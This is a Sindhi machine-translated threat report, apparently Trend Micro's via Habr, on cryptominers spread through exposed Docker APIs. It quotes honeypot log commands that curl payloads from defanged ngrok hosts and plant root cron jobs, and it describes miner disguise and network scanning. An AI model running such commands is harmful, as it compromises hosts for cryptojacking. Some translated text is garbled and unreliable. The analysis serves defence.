پرو هوسٽر > بلاگ > انتظاميه > ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ

اسان هني پوٽ ڪنٽينرز استعمال ڪندي گڏ ڪيل ڊيٽا جو تجزيو ڪيو، جيڪو اسان خطرن کي ٽريڪ ڪرڻ لاءِ ٺاهيو. ۽ اسان اڻڄاتل يا غير مجاز cryptocurrency miners کان اهم سرگرمي ڳولي لڌيون آهن جيڪي ڊڪر هب تي ڪميونٽي طرفان شايع ٿيل تصوير کي استعمال ڪندي بدمعاش ڪنٽينرز طور مقرر ڪيا ويا آهن. تصوير هڪ خدمت جي حصي طور استعمال ڪئي وئي آهي جيڪا بدسلوڪي cryptocurrency miners کي پهچائي ٿي.

اضافي طور تي، نيٽ ورڪ سان ڪم ڪرڻ لاء پروگرام نصب ٿيل آهن کليل پاڙيسري ڪنٽينرز ۽ ايپليڪيشنن کي داخل ڪرڻ لاء.

اسان پنهنجا هيني پوٽ ڇڏي ڏيون ٿا جيئن ته، اهو آهي، ڊفالٽ سيٽنگن سان، بغير ڪنهن حفاظتي قدمن يا اضافي سافٽ ويئر جي انسٽاليشن جي. مهرباني ڪري نوٽ ڪريو ته ڊڪر کي سفارشون آهن ابتدائي سيٽ اپ لاءِ غلطين ۽ سادي نقصانن کان بچڻ لاءِ. پر هيني پاٽ استعمال ٿيل ڪنٽينر آهن، حملن کي ڳولڻ لاءِ ٺهيل آهن جن جو مقصد ڪنٽينرائيزيشن پليٽ فارم تي آهي، نه ته ڪنٽينرز اندر ايپليڪيشنون.

معلوم ٿيل بدسلوڪي سرگرمي پڻ قابل ذڪر آهي ڇاڪاڻ ته ان کي نقصان جي ضرورت ناهي ۽ ڊڪر ورزن کان پڻ آزاد آهي. هڪ غلط ترتيب ڏنل ڳولڻ، ۽ تنهن ڪري کليل، ڪنٽينر تصوير اهو آهي ته حملي ڪندڙن کي ڪيترن ئي کليل سرورز کي متاثر ڪرڻ جي ضرورت آهي.

غير بند ٿيل Docker API صارف کي اجازت ڏئي ٿو ته وسيع رينج کي انجام ڏئي ٽيمون, جنهن ۾ هلندڙ ڪنٽينر جي لسٽ حاصل ڪرڻ، مخصوص ڪنٽينر مان لاگ حاصل ڪرڻ، شروع ڪرڻ، بند ڪرڻ (بشمول زبردستي) ۽ حتي مخصوص سيٽنگن سان مخصوص تصوير مان نئون ڪنٽينر ٺاهڻ.

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ
کاٻي پاسي مالويئر پهچائڻ جو طريقو آهي. ساڄي پاسي حملي آور جو ماحول آهي، جيڪو تصويرن مان ريموٽ رولنگ جي اجازت ڏئي ٿو.

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ
3762 اوپن ڊاکر APIs جي ملڪ طرفان تقسيم. Shodan ڳولا جي بنياد تي تاريخ 12.02.2019/XNUMX/XNUMX

حملي جي زنجير ۽ پيل لوڊ جا اختيار

خراب سرگرمي نه رڳو honeypots جي مدد سان معلوم ڪيو ويو آهي. شوڊان مان ڊيٽا ڏيکاري ٿي ته ظاهر ٿيل ڊڪر APIs جو تعداد (ڏسو ٻيو گراف) وڌي ويو آهي جڏهن کان اسان تحقيق ڪئي هڪ غلط ترتيب ڏنل ڪنٽينر کي استعمال ڪرڻ لاءِ پل جي طور تي استعمال ڪيو Monero cryptocurrency مائننگ سافٽ ويئر. گذريل سال آڪٽوبر ۾ (2018، موجوده ڊيٽا توهان هن وانگر ڏسي سگهو ٿا لڳ ڀڳ مترجم) صرف 856 کليل APIs هئا.

honeypot لاگز جي هڪ امتحان ڏيکاري ٿي ته ڪنٽينر جي تصوير جو استعمال پڻ استعمال سان لاڳاپيل هو ngrok, محفوظ ڪنيڪشن قائم ڪرڻ يا عوامي طور تي پهچندڙ پوائنٽن کان مخصوص ايڊريس يا وسيلن ڏانهن ٽرئفڪ کي اڳتي وڌائڻ لاءِ هڪ اوزار (مثال طور localhost). هي حملو ڪندڙن کي متحرڪ طور تي URLs ٺاهڻ جي اجازت ڏئي ٿو جڏهن هڪ کليل سرور تي پيل لوڊ پهچائڻ. هيٺ ڏنل ڪوڊ جا مثال آهن لاگز مان جيڪي ngrok سروس جو غلط استعمال ڏيکاري رهيا آهن:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

جئين توهان ڏسي سگهو ٿا، اپلوڊ ٿيل فائلون مسلسل تبديل ٿيندڙ URLs مان ڊائون لوڊ ڪيا ويا آهن. انهن URLs جي هڪ مختصر ختم ٿيڻ جي تاريخ آهي، تنهن ڪري پيل لوڊ ختم ٿيڻ جي تاريخ کان پوءِ ڊائون لوڊ نٿا ٿي سگهن.

اتي ٻه پيل لوڊ آپشن آهن. پهريون لينڪس لاءِ هڪ مرتب ڪيل ELF مائنر آهي (جنهن جي وضاحت ڪئي وئي آهي Coinminer.SH.MALXMR.ATNO) جيڪا مائننگ پول سان ڳنڍي ٿي. ٻيو هڪ اسڪرپٽ آهي (TrojanSpy.SH.ZNETMAP.A) خاص نيٽ ورڪ اوزار حاصل ڪرڻ لاءِ ٺهيل آهي جيڪي نيٽ ورڪ رينجز کي اسڪين ڪرڻ لاءِ استعمال ڪيا ويندا آهن ۽ پوءِ نوان هدف ڳولڻ لاءِ.

ڊراپر اسڪرپٽ ٻن متغيرن کي سيٽ ڪري ٿو، جيڪي پوء استعمال ڪيا ويندا آهن cryptocurrency Miner کي ترتيب ڏيڻ لاء. HOST متغير URL تي مشتمل آهي جتي بدسلوڪي فائلون واقع آهن، ۽ RIP متغير آهي فائل جو نالو (حقيقت ۾، هيش) مائنر کي ترتيب ڏيڻ لاء. هر دفعي HOST متغير تبديل ٿيندو آهي جڏهن هيش متغير تبديل ٿئي ٿو. اسڪرپٽ پڻ چيڪ ڪرڻ جي ڪوشش ڪري ٿو ته ڪو ٻيو cryptocurrency miners حملو ٿيل سرور تي نه هلائي رهيا آهن.

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ
HOST ۽ RIP متغيرن جا مثال، انهي سان گڏ هڪ ڪوڊ اسنيپٽ استعمال ڪيو ويو آهي چيڪ ڪرڻ لاءِ ته ٻيو ڪو به ڪم ڪندڙ نه هلي رهيو آهي

مائنر شروع ڪرڻ کان اڳ، ان جو نالو تبديل ڪيو ويو nginx. ھن اسڪرپٽ جا ٻيا ورجن مائنر جو نالو تبديل ڪن ٿا ٻين جائز خدمتن لاءِ جيڪي شايد لينڪس ماحول ۾ موجود ھجن. اهو عام طور تي هلندڙ عملن جي فهرست جي خلاف چيڪن کي نظرانداز ڪرڻ لاءِ ڪافي آهي.

ڳولها اسڪرپٽ پڻ خاصيتون آهن. اهو ساڳيو يو آر ايل سروس سان ڪم ڪري ٿو ضروري اوزارن کي ترتيب ڏيڻ لاءِ. انهن مان zmap بائنري آهي، جيڪو نيٽ ورڪ کي اسڪين ڪرڻ ۽ کليل بندرگاهن جي فهرست حاصل ڪرڻ لاءِ استعمال ڪيو ويندو آهي. اسڪرپٽ هڪ ٻي بائنري پڻ لوڊ ڪري ٿي جيڪا مليل خدمتن سان رابطو ڪرڻ لاءِ استعمال ٿئي ٿي ۽ مليل سروس بابت اضافي معلومات جو تعين ڪرڻ لاءِ انهن کان بينر وصول ڪيو وڃي ٿو (مثال طور، ان جو نسخو).

اسڪرپٽ پڻ اسڪين ڪرڻ لاء ڪجهه نيٽ ورڪ جي حدن کي اڳ ۾ ئي مقرر ڪري ٿو، پر اهو اسڪرپٽ جي ورزن تي منحصر آهي. اهو پڻ مقرر ڪري ٿو ٽارگيٽ بندرگاهن جي خدمتن مان- هن صورت ۾، ڊڪر- اسڪين کي هلائڻ کان اڳ.

جيئن ئي ممڪن حدف مليا ويندا، بينر پاڻمرادو انهن تان هٽايا ويندا آهن. اسڪرپٽ پڻ مقصدن کي فلٽر ڪري ٿو خدمتن، ايپليڪيشنن، اجزاء يا دلچسپي جي پليٽ فارم تي منحصر ڪري ٿو: Redis، Jenkins، Drupal، MODX، ڪبرنيٽس ماسٽر، Docker 1.16 ڪلائنٽ ۽ Apache CouchDB. جيڪڏهن اسڪين ٿيل سرور انهن مان ڪنهن سان ملندو آهي، اهو هڪ ٽيڪسٽ فائل ۾ محفوظ ڪيو ويندو آهي، جيڪو حملو ڪندڙ بعد ۾ بعد ۾ تجزيو ۽ هيڪنگ لاء استعمال ڪري سگھن ٿا. اهي ٽيڪسٽ فائلون متحرڪ لنڪ ذريعي حملي ڪندڙن جي سرورز تي اپلوڊ ڪيون ويون آهن. اهو آهي، هر فائل لاء هڪ الڳ URL استعمال ڪيو ويندو آهي، جنهن جو مطلب آهي ته بعد ۾ رسائي ڏکيو آهي.

حملي جو ویکٹر هڪ ڊاکر تصوير آهي، جيئن ڏسي سگهجي ٿو ايندڙ ٻن ٽڪرن ۾ ڪوڊ.

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ
مٿي تي هڪ جائز خدمت جو نالو مٽائي رهيو آهي، ۽ تري ۾ اهو آهي ته نيٽ ورڪ کي اسڪين ڪرڻ لاءِ zmap ڪيئن استعمال ٿئي ٿو

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ
مٿي تي اڳواٽ بيان ڪيل نيٽ ورڪ رينجز آهن، هيٺيون آهن مخصوص بندرگاهن جي خدمتن جي ڳولا لاءِ، بشمول ڊڪر

ڪئين غير ملڪيت وارو Docker API ۽ ڪميونٽي مان عوامي تصويرون استعمال ڪيون وينديون آهن cryptocurrency miners کي ورهائڻ لاءِ
اسڪرين شاٽ ڏيکاري ٿو ته الپائن-ڪرل تصوير 10 ملين کان وڌيڪ ڀيرا ڊائون لوڊ ڪيو ويو آهي

الپائن لينڪس ۽ ڪرل جي بنياد تي، مختلف پروٽوڪول تي فائلن کي منتقل ڪرڻ لاء وسيلن جي موثر CLI اوزار، توهان ٺاهي سگهو ٿا ڊاکر تصوير. جئين توهان پوئين تصوير ۾ ڏسي سگهو ٿا، هن تصوير کي 10 ملين کان وڌيڪ ڀيرا ڊائون لوڊ ڪيو ويو آهي. وڏي تعداد ۾ ڊائون لوڊ ٿيڻ جو مطلب ٿي سگھي ٿو ته ھن تصوير کي داخلا پوائنٽ طور استعمال ڪيو؛ ھي تصوير ڇھ مھينا اڳ کان وڌيڪ اپڊيٽ ڪئي وئي ھئي؛ استعمال ڪندڙ ٻين تصويرن کي ھن مخزن مان اڪثر ڊائون لوڊ نه ڪندا آھن. Docker ۾ داخلا جو نقطو - ھدايتن جو ھڪڙو سيٽ استعمال ڪيو ويو ھڪڙي ڪنٽينر کي ترتيب ڏيڻ لاء ان کي هلائڻ لاء. جيڪڏهن داخلا پوائنٽ سيٽنگون غلط آهن (مثال طور، ڪنٽينر انٽرنيٽ کان کليل رهجي ويو آهي)، تصوير کي حملي جي ویکٹر طور استعمال ڪري سگهجي ٿو. حملو ڪندڙ ان کي استعمال ڪري سگھن ٿا پئلوڊ پهچائڻ لاءِ جيڪڏھن اھي ڳولھين ته غلط ترتيب ڏنل يا کليل ڪنٽينر غير سپورٽ ٿيل ڇڏي ويو.

اهو نوٽ ڪرڻ ضروري آهي ته هي تصوير (alpine-curl) پاڻ خراب نه آهي، پر جيئن توهان مٿي ڏسي سگهو ٿا، اهو بدسلوڪي ڪم ڪرڻ لاء استعمال ڪري سگهجي ٿو. ساڳيون ڊڪر تصويرون پڻ استعمال ڪري سگھجن ٿيون بدسلوڪي سرگرمين کي انجام ڏيڻ لاءِ. اسان ڊاڪر سان رابطو ڪيو ۽ انهن سان گڏ هن مسئلي تي ڪم ڪيو.

سفارشون

غلط سيٽنگ رهي ٿو مسلسل مسئلو ڪيترن ئي ڪمپنين لاء، خاص طور تي لاڳو ڪندڙ DevOps، تيز ترقي ۽ ترسيل تي ڌيان ڏيڻ. هر شي کي آڊيٽنگ ۽ نگراني جي ضابطن جي تعميل ڪرڻ جي ضرورت آهي، ڊيٽا جي رازداري جي نگراني ڪرڻ جي ضرورت آهي، انهي سان گڏ انهن جي غير تعميل کان تمام گهڻو نقصان. سيڪيورٽي آٽوميشن کي ڊولپمينٽ لائف سائيڪل ۾ شامل ڪرڻ نه صرف توهان کي سيڪيورٽي سوراخ ڳولڻ ۾ مدد ڪري ٿي جيڪا ٻي صورت ۾ اڻڄاتل ٿي سگهي ٿي، پر اهو توهان جي غير ضروري ڪم لوڊ کي گهٽائڻ ۾ پڻ مدد ڪري ٿي، جيئن ته اضافي سافٽ ويئر هلائڻ هر دريافت ٿيل ڪمزوري لاءِ بلڊنگز يا غلط ترتيب ڏيڻ کان پوءِ.

هن مضمون ۾ بحث ڪيل واقعو شروع کان ئي حفاظت کي نظر ۾ رکڻ جي ضرورت کي نمايان ڪري ٿو، جنهن ۾ هيٺيان سفارشون شامل آهن:

  • سسٽم جي منتظمين ۽ ڊولپرز لاءِ: هميشه پنهنجي API سيٽنگون چيڪ ڪريو انهي کي يقيني بڻائڻ لاءِ ته هر شي ترتيب ڏنل آهي صرف هڪ مخصوص سرور يا اندروني نيٽ ورڪ کان درخواستون قبول ڪرڻ لاءِ.
  • گھٽ ۾ گھٽ حقن جي اصول تي عمل ڪريو: پڪ ڪريو ته ڪنٽينر تصويرون سائن ۽ تصديق ٿيل آھن، نازڪ اجزاء تائين رسائي کي محدود ڪريو (ڪنٽينر لانچ سروس) ۽ نيٽ ورڪ ڪنيڪشن ۾ انڪرپشن شامل ڪريو.
  • پيروي ڪريو سفارشون ۽ سيڪيورٽي ميڪانيزم کي فعال ڪريو، مثال طور Docker کان ۽ تعمير ٿيل حفاظت جون خاصيتون.
  • ڪنٽينر ۾ هلندڙ عملن جي باري ۾ اضافي معلومات حاصل ڪرڻ لاءِ رن ٽائمز ۽ تصويرن جي خودڪار اسڪيننگ استعمال ڪريو (مثال طور، اسپفنگ کي ڳولڻ يا نقصانن جي ڳولا لاءِ). ايپليڪيشن ڪنٽرول ۽ سالميت جي نگراني سرور، فائلن، ۽ سسٽم جي علائقن ۾ غير معمولي تبديلين کي ٽريڪ ڪرڻ ۾ مدد ڪري ٿي.

Trendmicro DevOps ٽيمن کي محفوظ طور تي تعمير ڪرڻ، جلدي رول آئوٽ ڪرڻ، ۽ ڪٿي به لانچ ڪرڻ ۾ مدد ڪري ٿي. رجحان مائڪرو هائبرڊ ڪلائوڊ سيڪيورٽي هڪ تنظيم جي DevOps پائپ لائن تي طاقتور، منظم، ۽ خودڪار سيڪيورٽي فراهم ڪري ٿي ۽ ڪيترن ئي خطرن جي حفاظت فراهم ڪري ٿي ايڪس جين رن ٽائم تي جسماني، ورچوئل ۽ ڪلائوڊ ڪم لوڊ کي بچائڻ لاءِ. اهو پڻ شامل ڪري ٿو ڪنٽينر سيڪيورٽي سان گہرے سيڪيورٽي и ڊيپ سيڪيورٽي اسمارٽ چيڪ، جيڪو ڊولپمينٽ پائپ لائن ۾ ڪنهن به نقطي تي مالويئر ۽ ڪمزورين لاءِ ڊاڪر ڪنٽينر جون تصويرون اسڪين ڪري ٿو ته جيئن خطرن کي روڪيو وڃي ته جيئن انهن کي مقرر ڪيو وڃي.

ٺاهه جون نشانيون

لاڳاپيل هيش:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

تي Docker وڊيو ڪورس مشق ڪندڙ ڳالهائيندڙ ڏيکارين ٿا ته ڪهڙيون سيٽنگون پهرين ٺاهڻ جي ضرورت آهي امڪان کي گهٽائڻ يا مڪمل طور تي مٿي بيان ڪيل صورتحال جي واقعن کان بچڻ لاءِ. ۽ آگسٽ 19-21 تي هڪ آن لائن شدت تي DevOps اوزار ۽ چيٽس توهان انهن ۽ اهڙن سيڪيورٽي مسئلن تي ساٿين ۽ عملي استادن سان گڏ گول ميز تي بحث ڪري سگهو ٿا، جتي هرڪو ڳالهائي سگهي ٿو ۽ تجربيڪار ساٿين جي تڪليفن ۽ ڪاميابين کي ٻڌي سگهي ٿو.

جو ذريعو: www.habr.com

تبصرو شامل ڪريو